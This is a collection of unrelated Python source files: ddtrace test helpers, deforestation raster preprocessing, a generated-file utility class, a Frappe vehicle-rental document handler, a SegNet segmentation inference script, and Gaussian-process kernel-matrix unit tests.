            analytics_enabled=ddtrace.config.analytics_enabled,
            report_hostname=ddtrace.config.report_hostname,
        )
        for name, old_value in previous.items():
            setattr(ddtrace.config, name, values.get(name, old_value))
        try:
            yield
        finally:
            for name, old_value in previous.items():
                setattr(ddtrace.config, name, old_value)

    @staticmethod
    @contextlib.contextmanager
    def override_config(integration, values):
        """
        Temporarily override an integration configuration value

        >>> with self.override_config('flask', dict(service_name='test-service')):
            # Your test
        """
        options = getattr(ddtrace.config, integration)
        saved = {key: options.get(key) for key in values}
        options.update(values)
        try:
            yield
        finally:
            options.update(saved)

    @staticmethod
    @contextlib.contextmanager
    def override_http_config(integration, values):
        """
        Temporarily override an integration's HTTP configuration values

        >>> with self.override_http_config('flask', dict(trace_query_string=True)):
            # Your test
        """
        options = getattr(ddtrace.config, integration).http
        saved = {}
        for key, new_value in values.items():
            saved[key] = getattr(options, key)
            setattr(options, key, new_value)
        try:
            yield
        finally:
            for key, old_value in saved.items():
                setattr(options, key, old_value)

    @staticmethod
    @contextlib.contextmanager
    def override_sys_modules(modules):
        """
        Temporarily layer the provided module mapping on top of ``sys.modules``

        >>> mock_module = mock.MagicMock()
        >>> mock_module.fn.side_effect = lambda: 'test'
        >>> with self.override_sys_modules(dict(A=mock_module)):
            # Your test
        """
        snapshot = dict(sys.modules)
        sys.modules.update(modules)
        try:
            yield
        finally:
            sys.modules.clear()
            sys.modules.update(snapshot)
# TODO[tbutt]: Remove this once all tests are properly using BaseTracerTestCase
# Backwards-compat module-level alias so existing tests can use the context
# manager without subclassing BaseTestCase.
override_config = BaseTestCase.override_config
class BaseTracerTestCase(TestSpanContainer, BaseTestCase):
    """
    BaseTracerTestCase is a base test case for when you need access to a dummy tracer and span assertions
    """
    def setUp(self):
        """Before each test case, setup a dummy tracer to use"""
        self.tracer = DummyTracer()
        super(BaseTracerTestCase, self).setUp()

    def tearDown(self):
        """After each test case, reset and remove the dummy tracer"""
        super(BaseTracerTestCase, self).tearDown()
        self.reset()
        delattr(self, 'tracer')

    def get_spans(self):
        """Required subclass method for TestSpanContainer"""
        # NOTE(review): assumes the DummyTracer writer buffers finished spans
        # in `.spans` — confirm against tests/utils/tracer.py.
        return self.tracer.writer.spans

    def reset(self):
        """Helper to reset the existing list of spans created"""
        # pop() drains the writer's buffered spans.
        self.tracer.writer.pop()

    def trace(self, *args, **kwargs):
        """Wrapper for self.tracer.trace that returns a TestSpan"""
        return TestSpan(self.tracer.trace(*args, **kwargs))

    def start_span(self, *args, **kwargs):
        """Helper for self.tracer.start_span that returns a TestSpan"""
        return TestSpan(self.tracer.start_span(*args, **kwargs))

    def assert_structure(self, root, children=NO_CHILDREN):
        """Helper to call TestSpanNode.assert_structure on the current root span"""
        root_span = self.get_root_span()
        root_span.assert_structure(root, children)

    @contextlib.contextmanager
    def override_global_tracer(self, tracer=None):
        # Temporarily swap ddtrace.tracer for this test's tracer (or the
        # provided one), restoring the original afterwards.
        original = ddtrace.tracer
        tracer = tracer or self.tracer
        setattr(ddtrace, 'tracer', tracer)
        try:
            yield
        finally:
            setattr(ddtrace, 'tracer', original)
|
# PatBall1/DeepForestcast
from torchvision.transforms import ToTensor
from PIL import Image
# import rasterio
import numpy as np
import torch
import os.path
def to_Tensor(path, name):
    """
    Load a single TIFF file from ``path`` as a 2D tensor
    (the singleton channel dimension added by ToTensor is dropped).
    """
    raw = Image.open(path + "/" + name)
    tensor = ToTensor()(raw)
    return tensor.squeeze(dim=0)
'''
def to_Tensor(path, name):
"""
Load Tiff files as tensors
"""
t = rasterio.open(path + "/" + name)
t = ToTensor()(t)
t = t.squeeze(dim=0)
return t
'''
def last_to_image(path, year):
    """
    Given path to folder having tiff files for each last band for given year
    returns a float tensor whose channels are bands 1-4 for that year.
    """
    bands = []
    # Band files are named last_20<yy>_<band>.tif, bands 1 through 4.
    for band_idx in range(1, 5):
        raw = Image.open(path + "/last_20%d_%d.tif" % (year, band_idx))
        bands.append(ToTensor()(raw))
    return torch.cat(bands, dim=0).float()
def rescale_image(image):
    """
    Standardize an image tensor per channel, using only non-masked pixels
    (value != -1 in the first channel) to compute the statistics.

    Accepts a 2D (H, W) or 3D (C, H, W) tensor; a 2D input is returned in
    its original 2D shape. Returns (rescaled_image, mean, std).
    """
    # Detach and clone so the caller's tensor is never modified.
    out = image.data.clone()
    was_2d = len(image.shape) == 2
    if was_2d:
        out = out.unsqueeze(dim=0)
    # Spatial coordinates of non-masked pixels, taken from channel 0.
    coords = (out[0, :, :] != -1).nonzero()
    rows, cols = coords[:, 0], coords[:, 1]
    mean = out[:, rows, cols].mean(1, keepdim=True)
    std = out[:, rows, cols].std(1, keepdim=True)
    # Standardize only the valid pixels; masked ones keep their -1 value.
    out[:, rows, cols] = (out[:, rows, cols] - mean) / std
    if was_2d:
        out = out.squeeze(dim=0)
        mean = mean.squeeze(dim=0)
        std = std.squeeze(dim=0)
    return (out, mean, std)
def if_def_when(lossyear, year, cutoffs=None):
    """
    Creates categorical variables for deforestration event given cutoffs.
    Values in cutoffs define the time bins (default [2, 5, 8]).
    Returns len(cutoffs) + 1 categorical layers:
    Example: cutoffs = [2,5,8], num of layers = 4 , considered year = year
    Categories:
    0) if year - lossyear is in [0,2)
    1) if year - lossyear is in [2,5)
    2) if year - lossyear is in [5,8)
    3) 8 years ago or more
    No prior knowledge:
    if loss event is in year > considered year or pixel is non deforested up to 2018+, all categories have value 0
    """
    # BUG FIX: the previous signature `cutoffs=[2, 5, 8]` used a mutable
    # default that was mutated in place (append/insert below), so repeated
    # calls grew the shared default — and a caller's own list. Copy instead.
    bins = [2, 5, 8] if cutoffs is None else list(cutoffs)
    bins.append(year)
    bins.insert(0, 0)
    # Work on a copy so the caller's lossyear raster is not clobbered.
    lossyear = lossyear.clone()
    # Losses after the considered year are unknown at `year`: treat as no loss.
    lossyear[(lossyear > year)] = 0
    losses = []
    for idx in range(0, len(bins) - 1):
        deff = torch.zeros(lossyear.size())
        deff[
            (bins[idx] <= (year - lossyear)) & ((year - lossyear) < bins[idx + 1])
        ] = 1
        losses.append(deff.float())
    losses = torch.stack(losses)
    # Return Nan values encoded as needed:
    losses[:, (lossyear == -1)] = -1
    return losses
def create_tnsors_pixels(
    year,
    latest_yr,
    tree_p=30,
    cutoffs=[2, 5, 8],
    sourcepath=None,
    rescale=True,
    wherepath=None,
):
    """
    Given year, and cutoffs as defined above returns (and save if wherepath!= None)
    Static tensor,
    Non static tensor,
    list of valid pixels coordinates,
    list of labels corresponding to this valid cordinates
    sourcepath = path to tiff files
    wherepath = in not None, path to where to save the tensors
    Static tensor is identical for any year, hence save only once
    Static tensor has datamask layer and treecover
    Nonstatic tensor has if_deff_when categorical layers and the image landset 7 bands stacked
    Valid pixels are these that meet all the following conditions :
    1. datamask == 1 , eg land not water body
    2. tree_cover > tree_p or gain == 1 if tree canopy in 2000 > tree_p or became forest up to 2012
    3. lossyear > year or lossyear == 0 experienced loss only after that year (or not at all in the study period)
    4. buffer == 0 is in Madre de Dios area
    for each valid pixel assign label 1 if it is deforested in exactly in year+1 or zero otherwise
    All pixels in the rasters and produced tensors have value 111 in the locations outside Area of Interest and its buffer
    """
    # NOTE(review): `cutoffs` is a mutable default argument, and it is passed
    # to if_def_when(), which appends/inserts into its argument in place —
    # repeated calls with the default will grow the shared list. Verify/fix.
    # File names assume two-digit years (e.g. latest_yr=18 -> "..._2018.tif").
    buffer = to_Tensor(sourcepath, "buffer.tif")
    gain = to_Tensor(sourcepath, "gain_20" + str(latest_yr) + ".tif")
    lossyear = to_Tensor(sourcepath, "lossyear_20" + str(latest_yr) + ".tif")
    datamask = to_Tensor(sourcepath, "datamask_20" + str(latest_yr) + ".tif")
    tree_cover = to_Tensor(sourcepath, "treecover2000_20" + str(latest_yr) + ".tif")
    tree_cover = tree_cover.float()
    datamask = datamask.float()
    # Create list of valid pixels coordinates
    pixels = (
        (datamask == 1)  # land (not water body)
        & ((tree_cover > tree_p) | (gain == 1))  # forest in 2000 or became forest up to 2012
        & (
            (lossyear > year) | (lossyear == 0)
        )  # experienced loss only after that year (or not at all in the study period)
        & (
            buffer == 0
        )
    ).nonzero()  # In area of interest
    # Create list of valid pixels labels in year + 1 (boolean tensor).
    labels = lossyear[pixels[:, 0], pixels[:, 1]] == (
        year + 1
    )  # can be change to >= (year+1) & <111
    # Could add here labels for +2 years
    # labels2 = lossyear[pixels[:, 0], pixels[:, 1]] == (
    #     year + 2
    # )
    # labels = labels + 2*labels2
    # NOTE(review): if_def_when mutates `lossyear` (zeroes entries > year)
    # and `cutoffs` in place; labels above are computed before this call.
    when = if_def_when(lossyear, year, cutoffs=cutoffs)
    image = last_to_image(sourcepath, year)
    if rescale:
        # Rescale datamask to have values -1 for nan, 0 for land, 1 for water
        datamask[datamask != -1] = datamask[datamask != -1] - 1
        # Rescale tree_cover to have values in [0, 1] and -1 for nan
        tree_cover[tree_cover != -1] = tree_cover[tree_cover != -1] * 0.01
        # Normalize image by channel with -1 values for nan
        image, _, _ = rescale_image(image)
    # Create non Static tensor
    image = torch.cat((when, image), dim=0)
    # Creates static tensor
    static = torch.stack((datamask, tree_cover))
    # Creates non static tensor
    if wherepath:
        if not os.path.isfile(wherepath + "/" + "static.pt"):
            torch.save(static, wherepath + "/" + "static.pt")
        torch.save(image, wherepath + "/" + "tensor_%d.pt" % (year))
        torch.save(pixels, wherepath + "/" + "pixels_cord_%d.pt" % (year))
        torch.save(labels, wherepath + "/" + "labels_%d.pt" % (year))
    return static, image, pixels, labels
|
import logging
import json
import os
from os.path import exists
import time
import shutil
__author__ = "<NAME>"
__copyright__ = "<NAME>"
__license__ = "MIT"

# Module-level logger; handlers/levels are configured by the application.
_logger = logging.getLogger(__name__)

# Valid sub-directories under generated/ that generate_json_file may target.
generation_types = ['schemas', 'analyzers']
class FileUtility:
    """Static helpers for files under the package-level ``generated`` directory.

    Covers creating JSON schema/analyzer files, computing date-stamped names
    and paths, reading and deleting files, purging the generated
    sub-directories, zipping folders, and listing usable workspace files.
    """

    @staticmethod
    def _generated_root():
        # Absolute path of '<package parent>/generated'; single source of
        # truth for every path computation in this class.
        return os.path.join(
            os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)),
            'generated')

    @staticmethod
    def generate_json_file(database_name, data, generation_type):
        """Serialize *data* as pretty-printed JSON under ``generated/<type>/``.

        Raises:
            Exception: if *generation_type* is not one of ``generation_types``.
        """
        # Validate first so an invalid type never touches the filesystem.
        if generation_type not in generation_types:
            raise Exception("generation_type {type} not found!".format(type=generation_type))
        file_name = FileUtility.get_filename(database_name)
        json_schema = json.dumps(data, indent=4)
        target = '{path}/{type}/{file_name}.json'.format(
            path=FileUtility._generated_root(), file_name=file_name, type=generation_type)
        with open(target, 'w') as outfile:
            outfile.write(json_schema)

    @staticmethod
    def get_filename(database_name):
        """Return '<database>_<YYYYMMDD>' using today's date."""
        file_date = time.strftime("%Y%m%d")
        return "{database}_{date}".format(database=database_name, date=file_date)

    @staticmethod
    def is_generated_file_exist(database_name, generation_type):
        """Return True if today's generated file for *database_name* exists."""
        full_path = FileUtility.get_generated_file_path(database_name, generation_type)
        return exists(full_path)

    @staticmethod
    def load_generated_file(database_name, generation_type):
        """Load today's generated JSON file and return the parsed data."""
        full_path = FileUtility.get_generated_file_path(database_name, generation_type)
        with open(full_path) as json_file:
            return json.load(json_file)

    @staticmethod
    def get_generated_file_path(database_name, generation_type):
        """Return the path of today's generated JSON file for *database_name*."""
        file_name = FileUtility.get_filename(database_name)
        return '{path}/{type}/{file_name}.json'.format(
            path=FileUtility._generated_root(), file_name=file_name, type=generation_type)

    @staticmethod
    def get_csv_file_directory_path(database_name):
        """Return ``generated/csvs/<database_name>`` (directory is not created here)."""
        return "{path}/csvs/{database_name}".format(
            path=FileUtility._generated_root(), database_name=database_name)

    @staticmethod
    def get_csv_file_path(table_name, database_name):
        """Return the CSV path for *table_name*, creating its directory if needed."""
        file_name = FileUtility.get_filename(table_name)
        directory_path = FileUtility.get_csv_file_directory_path(database_name)
        if not os.path.exists(directory_path):
            os.makedirs(directory_path)
        return '{path}/{file_name}.csv'.format(path=directory_path, file_name=file_name)

    @staticmethod
    def read_file(file_path):
        """Return the full text of *file_path*.

        Uses a context manager so the handle is closed even if ``read()``
        raises (the original left the file open on error).
        """
        with open(file_path) as file:
            return file.read()

    @staticmethod
    def delete_files(folder_path):
        """Delete every regular file directly inside *folder_path*.

        Sub-directories are left untouched; failures are logged, not raised,
        so one undeletable file does not abort the purge.
        """
        for filename in os.listdir(folder_path):
            file_path = os.path.join(folder_path, filename)
            try:
                if os.path.isfile(file_path):
                    os.unlink(file_path)
            except Exception as e:
                _logger.error('Failed to delete %s. Reason: %s' % (file_path, e))

    @staticmethod
    def purge_generated_files():
        """Delete all files in the schemas, analyzers and csvs sub-directories."""
        root = FileUtility._generated_root()
        FileUtility.delete_files(os.path.join(root, 'schemas'))
        FileUtility.delete_files(os.path.join(root, 'analyzers'))
        FileUtility.delete_files(os.path.join(root, 'csvs'))

    @staticmethod
    def purge_analyzer_files():
        """Delete all previously generated analyzer files."""
        print("- Purging old analyzer files...")
        FileUtility.delete_files(os.path.join(FileUtility._generated_root(), 'analyzers'))

    @staticmethod
    def purge_schema_files():
        """Delete all previously generated schema files."""
        print("- Purging old schema files...")
        FileUtility.delete_files(os.path.join(FileUtility._generated_root(), 'schemas'))

    @staticmethod
    def purge_csv_files(database):
        """Delete all previously generated CSV files for *database*."""
        print("- Purging old CSV files...")
        FileUtility.delete_files(os.path.join(
            FileUtility._generated_root(), 'csvs', '{database}'.format(database=database)))

    @staticmethod
    def zip_and_save_folder(path, export_path):
        """Zip the folder at *path* and write the archive to *export_path*.zip."""
        shutil.make_archive(export_path, 'zip', path)

    @staticmethod
    def get_files_in_workspace(workspace_path, args):
        """Return a {option_number: full_path} dict of .csv/.zip files in the workspace.

        Prints a numbered menu unless ``args.disablePrompt`` is set.
        *workspace_path* is concatenated as-is, so it is expected to end with
        a path separator (kept for backward compatibility).
        """
        workspace_files = os.listdir(workspace_path)
        acceptable_files = {}
        option = 1
        for file in workspace_files:
            if file.lower().endswith(('.csv', '.zip')):
                acceptable_files[option] = "{workspace_path}{file}".format(workspace_path=workspace_path, file=file)
                if not args.disablePrompt:
                    print("- Option {option}: {file_name}".format(option=option, file_name=file))
                option += 1
        return acceptable_files
|
<filename>angola_erp/rent_a_car/doctype/ficha_tecnica_da_viatura/ficha_tecnica_da_viatura.py
# -*- coding: utf-8 -*-
# Copyright (c) 2019, <NAME> and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import _
from frappe import throw
from frappe.utils import formatdate, encode, date_diff
from frappe.model.document import Document
from frappe.model.naming import make_autoname
from datetime import datetime, timedelta
from frappe.utils import cstr, get_datetime, getdate, cint, get_datetime_str
class FichaTecnicadaViatura(Document):
    """Rental vehicle technical sheet ("Ficha Tecnica da Viatura").

    A sheet records either a vehicle leaving the station ("Saida", rental
    starts) or returning ("Entrada", rental ends); every hook branches on
    ``entrada_ou_saida_viatura`` accordingly.
    """

    def autoname(self):
        """Name the document from its naming series."""
        self.ficha_numero = make_autoname(self.naming_series)
        self.name = self.ficha_numero
        if self.entrada_ou_saida_viatura == "Entrada":
            self.docstatus = 0
        else:
            # First record of a rental: keep the vehicle in "Stand-by" until
            # the sheet is actually submitted.
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
            frappe.db.commit()
            self.docstatus = 0

    def validate(self):
        if self.entrada_ou_saida_viatura == "Entrada":
            # Return kilometers can never be below departure kilometers.
            # frappe.throw raises, so nothing after it runs (the original had
            # dead assignments following the throw).
            if self.kms_entrada < self.kms_saida:
                frappe.throw(_("Kilometros de Entrada errada!!!"))
        else:
            # The vehicle must be in "Stand-by"; otherwise someone already rented it.
            is_free = frappe.get_doc("Vehicle", self.matricula_veiculo)
            if not is_free.entrada_ou_saida == "Stand-by":
                frappe.throw(_("Esta viatura já está alugada, não é possivel continuar!!!"))

    def before_save(self):
        if self.entrada_ou_saida_viatura == "Entrada":
            # Amount due = daily base price * number of rental days.
            # NOTE(review): date_diff(entrada, saida) yields the opposite sign
            # of date_diff(saida, entrada) that the original debug output
            # printed -- confirm the intended argument order for total_dias.
            self.total_dias = self.preco_dia_basico * date_diff(self.data_entrada_estacao, self.data_saida_estacao)

    def on_submit(self):
        # Nothing to do here; all state transitions happen in before_submit.
        pass

    def on_cancel(self):
        self.docstatus = 2  # cancel the submission

    def before_cancel(self):
        if self.entrada_ou_saida_viatura == "Entrada":
            # Cancelling a return: the vehicle goes back to rented ("Saida").
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "entrada_ou_saida", "Saida")
            frappe.db.commit()
            self.status_viatura = 'Alugada'
            # TODO: the contract status still needs to be restored here.
        else:
            # Cancelling a departure: mark the vehicle available again.
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
            frappe.db.commit()
            self.status_viatura = 'Stand-by'

    def before_submit(self):
        if self.entrada_ou_saida_viatura == "Entrada":
            # Vehicle returned: free it and close the rental contract.
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "entrada_ou_saida", "Stand-by")
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "veiculo_alugado", 0)
            frappe.db.commit()
            frappe.db.set_value("Contractos Rent", self.contracto_numero, "status_contracto", "Terminou")
            frappe.db.commit()
            # Find the submitted "Saida" sheet of this contract and mark the
            # vehicle as returned on it. Fixed: use the documented
            # frappe.get_all API (was frappe.model.frappe.get_all) and guard
            # against an empty result before indexing [0] (the original
            # dereferenced fichasaida[0].name before checking).
            fichasaida = frappe.get_all(
                'Ficha Tecnica da Viatura',
                filters={'contracto_numero': self.contracto_numero,
                         'docstatus': 1,
                         'entrada_ou_saida_viatura': 'Saida'},
                fields=['name', 'contracto_numero'])
            if fichasaida:
                frappe.db.set_value("Ficha Tecnica da Viatura", fichasaida[0].name, "status_viatura", "Devolvida")
                frappe.db.commit()
            self.status_viatura = 'Devolvida'
            self.docstatus = 1
        else:
            # Vehicle leaving the station: mark it as rented out.
            frappe.db.set_value("Vehicle", self.matricula_veiculo, "entrada_ou_saida", "Saida")
            frappe.db.commit()
            self.status_viatura = 'Alugada'
            self.criar_carro_lastmile()

    def criar_carro_lastmile(self):
        """Record the vehicle's latest odometer reading in Vehicle_lastmile.

        The original used a Python 2 ``print`` statement here, which is a
        SyntaxError under Python 3; debug prints were removed.
        """
        # On a return use the return kilometers, otherwise the departure ones.
        if self.entrada_ou_saida_viatura == "Entrada":
            ultimo_km = self.kms_entrada
        else:
            ultimo_km = self.kms_saida
        car_lastmile = frappe.get_doc({
            "doctype": "Vehicle_lastmile",
            "matricula": self.matricula_veiculo,
            "ultimo_km": ultimo_km,
        })
        car_lastmile.insert()
|
from pytorch_segnet import *
import sys
import csv
def test(SegNet):
    """Run SegNet inference on every image in SAMPLES and save blended overlays.

    For each sample the predicted per-pixel class map is colorized with
    COLORS, alpha-blended (0.6) onto the source image, and written to
    OUTPUTS. Relies on module-level configuration (WEIGHTS, SAMPLES,
    OUTPUTS, CLASS_NUM, COLORS) being assigned before the call.
    """
    # Load trained weights on CPU and switch to inference mode.
    SegNet.load_state_dict(torch.load(WEIGHTS, map_location=torch.device('cpu')))
    SegNet.eval()
    paths = os.listdir(SAMPLES)
    for path in paths:
        image_src = cv.imread(SAMPLES + path)
        # Network input: 416x416, [0, 1]-scaled, CHW float tensor with batch dim.
        image = cv.resize(image_src, (416, 416))
        image = image / 255.0
        image = torch.Tensor(image)
        image = image.permute(2, 0, 1)
        image = torch.unsqueeze(image, dim=0)
        output, _ = SegNet(image)  # second return value (relu activations) unused
        output = torch.squeeze(output)
        output = output.argmax(dim=0)
        # Per-pixel class ids, upscaled back to the full 2048x1024 frame.
        output_np = cv.resize(np.uint8(output), (2048, 1024))
        image_seg = np.uint8(np.zeros((1024, 2048, 3)))
        colors = COLORS
        for c in range(CLASS_NUM):
            image_seg[:, :, 0] += np.uint8((output_np == c)) * np.uint8(colors[c][0])
            image_seg[:, :, 1] += np.uint8((output_np == c)) * np.uint8(colors[c][1])
            image_seg[:, :, 2] += np.uint8((output_np == c)) * np.uint8(colors[c][2])
        # NOTE(review): this rewrites the same CSV on every iteration, so only
        # the last sample's segmentation survives -- confirm that is intended.
        with open("./user_info.csv", "w", newline='') as f:
            writer = csv.writer(f)
            for column in image_seg:
                writer.writerow(column)
        image_seg = Image.fromarray(np.uint8(image_seg))
        image_src = cv.cvtColor(image_src, cv.COLOR_BGR2RGB)
        old_image = Image.fromarray(np.uint8(image_src))
        image = Image.blend(old_image, image_seg, 0.6)
        # image_np = np.array(image)
        # image_np[output_np == 0] = image_src[output_np == 0]
        # image = Image.fromarray(image_np)
        image.save(OUTPUTS + path)
        print(path + " is done!")
# Command-line configuration; this file is a script, so parsing runs at import.
parser = argparse.ArgumentParser()
parser.add_argument("--class_num", type=int, default=19, help="number of classes")
parser.add_argument("--weights", type=str, default="weights/SegNet_weights1625783040.5590682.pth", help="weights path")
parser.add_argument("--colors", type=int, default=[[0, 255, 0], [255, 0, 0], [0, 0, 255], [111, 74, 0], [70, 70, 70], [128, 64, 128], [0, 0, 0], [102, 102, 156], [190, 153, 153], [150, 100, 100], [107, 142, 35],
                    [152, 251, 152], [70, 130, 180], [220, 220, 0], [119, 11, 32], [215, 166, 66], [66, 88, 99], [154, 25, 244], [10, 155, 83]], help="mask")
parser.add_argument("--samples", type=str, default="samples//", help="path for sample")
parser.add_argument("--outputs", type=str, default="outputs//", help="path for output")
opt = parser.parse_args()
#print(opt)
# Module-level configuration consumed by test().
CLASS_NUM = opt.class_num
WEIGHTS = opt.weights
COLORS = opt.colors
SAMPLES = opt.samples
OUTPUTS = opt.outputs
# Bind the model instance to its own name so the SegNet *class* is not
# shadowed by the instance (the original rebound the class name).
segnet_model = SegNet(3, CLASS_NUM)
test(segnet_model)
|
import time
import pytest
import numpy as np
import flare.gp_algebra
from flare import gp
from flare.env import AtomicEnvironment
from flare.struc import Structure
from flare.kernels.mc_simple import two_plus_three_body_mc, \
two_plus_three_body_mc_grad
from flare.kernels.mc_sephyps import two_plus_three_body_mc \
as two_plus_three_body_mc_multi
from flare.kernels.mc_sephyps import two_plus_three_body_mc_grad \
as two_plus_three_body_mc_grad_multi
from flare.gp_algebra import get_like_grad_from_mats, \
get_kernel_vector, get_ky_mat, \
get_ky_mat_update, get_ky_and_hyp
from .fake_gp import get_tstp
@pytest.fixture(scope='module')
def params():
    """Build one random training set and share it across this test module."""
    shared = get_random_training_set(10)
    yield shared
    # Teardown: drop the reference once every test in the module has run.
    del shared
def get_random_training_set(nenv):
    """Create a random training set of *nenv* atomic environments.

    Also builds the kernel pairs and five hyperparameter configurations
    (four masked plus one plain):

    * multi hyper-parameters with two bond types and two triplet types
    * constrained optimization, with the noise parameter optimized
    * constrained optimization, without the noise parameter optimized
    * multi-hyps setup that is equivalent to no multi-hyps
    * simple hyper-parameters without any multi-hyps setup (mask is ``None``)

    The data is registered in ``flare.gp_algebra``'s module-level globals
    under the name ``"unit_test"`` so the algebra routines can find it.
    """
    np.random.seed(0)  # fixed seed: every run of this module sees the same data
    cutoffs = np.array([0.8, 0.8])
    hyps = np.ones(5, dtype=float)
    # (kernel, kernel_grad) pairs for the plain and the multi-hyps code paths.
    kernel = (two_plus_three_body_mc, two_plus_three_body_mc_grad)
    kernel_m = (two_plus_three_body_mc_multi, two_plus_three_body_mc_grad_multi)
    # 9 different hyper-parameters
    hyps_mask1 = {'nspec': 2,
                  'spec_mask': np.zeros(118, dtype=int),
                  'nbond': 2,
                  'bond_mask': np.array([0, 1, 1, 1]),
                  'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
                  'ntriplet': 2}
    hyps_mask1['spec_mask'][2] = 1
    hyps1 = np.ones(9, dtype=float)
    # 9 different hyper-parameters, only train the 0, 2, 4, 6, 8
    hyps_mask2 = {'nspec': 2,
                  'spec_mask': np.zeros(118, dtype=int),
                  'nbond': 2,
                  'bond_mask': np.array([0, 1, 1, 1]),
                  'ntriplet': 2,
                  'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
                  'train_noise':True,
                  'map':[0,2,4,6,8],
                  'original':np.array([1, 1, 1, 1, 1, 1, 1, 1, 1])}
    hyps_mask2['spec_mask'][2] = 1
    hyps2 = np.ones(5, dtype=float)
    # 9 different hyper-parameters, only train the 0, 2, 4, 6
    hyps_mask3 = {'nspec': 2,
                  'spec_mask': np.zeros(118, dtype=int),
                  'nbond': 2,
                  'bond_mask': np.array([0, 1, 1, 1]),
                  'ntriplet': 2,
                  'triplet_mask': np.array([0, 1, 1, 1, 1, 1, 1, 1]),
                  'train_noise':False,
                  'map':[0,2,4,6],
                  'original':np.array([1, 1, 1, 1, 1, 1, 1, 1, 1])}
    hyps_mask3['spec_mask'][2] = 1
    hyps3 = np.ones(4, dtype=float)
    # 5 different hyper-parameters, equivalent to no multihyps
    hyps_mask4 = {'nspec': 1,
                  'spec_mask': np.zeros(118, dtype=int),
                  'nbond': 1,
                  'bond_mask': np.array([0]),
                  'ntriplet': 1,
                  'triplet_mask': np.array([0])}
    hyps4 = np.ones(5, dtype=float)
    hyps_list = [hyps1, hyps2, hyps3, hyps4, hyps]
    hyps_mask_list = [hyps_mask1, hyps_mask2, hyps_mask3, hyps_mask4, None]
    # create test data: nenv random 5-atom structures with random force labels
    cell = np.eye(3)
    unique_species = [2, 1]
    noa = 5
    training_data = []
    training_labels = []
    for idenv in range(nenv):
        positions = np.random.uniform(-1, 1, [noa,3])
        species = np.random.randint(0, len(unique_species), noa)
        struc = Structure(cell, species, positions)
        training_data += [AtomicEnvironment(struc, 1, cutoffs)]
        training_labels += [np.random.uniform(-1, 1, 3)]
    training_labels = np.hstack(training_labels)
    # store it as global variables so gp_algebra routines can look it up by name
    name = "unit_test"
    flare.gp_algebra._global_training_data[name] = training_data
    flare.gp_algebra._global_training_labels[name] = training_labels
    return hyps, name, kernel, cutoffs, \
           kernel_m, hyps_list, hyps_mask_list
def test_ky_mat(params):
    """
    test function get_ky_mat in gp_algebra, gp_algebra_multi
    using gp_algebra_origin as reference
    TO DO: store the reference... and call it explicitly
    """
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    # get the reference
    # without multi hyps
    time0 = time.time()
    ky_mat0 = get_ky_mat(hyps, name, kernel[0], cutoffs)
    print("compute ky_mat serial", time.time()-time0)
    # parallel version: must reproduce the serial result bit-for-bit
    time0 = time.time()
    ky_mat = get_ky_mat(hyps, name,
                        kernel[0], cutoffs,
                        n_cpus=2, n_sample=20)
    print("compute ky_mat parallel", time.time()-time0)
    diff = (np.max(np.abs(ky_mat-ky_mat0)))
    assert (diff==0), "parallel implementation is wrong"
    # this part of the code can be use for timing the parallel performance
    # for n in [10, 50, 100]:
    #     timer0 = time.time()
    #     ky_mat = get_ky_mat(hyps, name,
    #                         kernel[0], cutoffs,
    #                         ncpus=8, n_sample=n)
    #     diff = (np.max(np.abs(ky_mat-ky_mat0)))
    #     print("parallel", n, time.time()-timer0, diff)
    #     assert (diff==0), "parallel implementation is wrong"
    # check multi hyps implementation
    # compute the ky_mat with different parameters; every masked setup is
    # constructed to be numerically identical to the reference
    for i in range(len(hyps_list)):
        hyps = hyps_list[i]
        hyps_mask = hyps_mask_list[i]
        if hyps_mask is None:
            ker = kernel[0]
        else:
            ker = kernel_m[0]
        # serial implementation
        time0 = time.time()
        ky_mat = get_ky_mat(hyps, name,
                            ker, cutoffs, hyps_mask)
        print(f"compute ky_mat with multihyps, test {i}, n_cpus=1", time.time()-time0)
        diff = (np.max(np.abs(ky_mat-ky_mat0)))
        assert (diff==0), "multi hyps implementation is wrong"\
                          f"with case {i}"
        # parallel implementation
        time0 = time.time()
        ky_mat = get_ky_mat(hyps, name,
                            ker,
                            cutoffs, hyps_mask, n_cpus=2, n_sample=20)
        print(f"compute ky_mat with multihyps, test {i}, n_cpus=2", time.time()-time0)
        diff = (np.max(np.abs(ky_mat-ky_mat0)))
        assert (diff==0), "multi hyps parallel "\
                          "implementation is wrong"\
                          f"with case {i}"
def test_ky_mat_update(params):
    """
    check ky_mat_update function: updating an 'old' covariance matrix with
    the remaining training points must equal a full recomputation.
    """
    hyps, name, kernel, cutoffs, \
        kernel_m, hyps_list, hyps_mask_list = params
    # prepare old data set as the starting point (first n training points)
    n = 5
    training_data = flare.gp_algebra._global_training_data[name]
    flare.gp_algebra._global_training_data['old'] = training_data[:n]
    training_labels = flare.gp_algebra._global_training_labels[name]
    flare.gp_algebra._global_training_labels['old'] = training_labels[:n]
    func = [get_ky_mat,
            get_ky_mat_update]
    # get the reference: full matrix and the 'old' sub-matrix
    ky_mat0 = func[0](hyps, name,
                      kernel[0], cutoffs)
    ky_mat_old = func[0](hyps, 'old',
                         kernel[0], cutoffs)
    # update the old matrix to the full data set
    ky_mat = func[1](ky_mat_old, hyps, name,
                     kernel[0], cutoffs)
    diff = (np.max(np.abs(ky_mat-ky_mat0)))
    assert (diff==0), "update function is wrong"
    # parallel version
    ky_mat = func[1](ky_mat_old, hyps, name,
                     kernel[0], cutoffs,
                     n_cpus=2, n_sample=20)
    diff = (np.max(np.abs(ky_mat-ky_mat0)))
    assert (diff==0), "parallel implementation is wrong"
    # check multi hyps implementation
    for i in range(len(hyps_list)):
        hyps = hyps_list[i]
        hyps_mask = hyps_mask_list[i]
        if hyps_mask is None:
            ker = kernel[0]
        else:
            ker = kernel_m[0]
        # serial implementation (tolerance 1e-12: masked path may differ by rounding)
        ky_mat = func[1](ky_mat_old, hyps, name,
                         ker, cutoffs, hyps_mask)
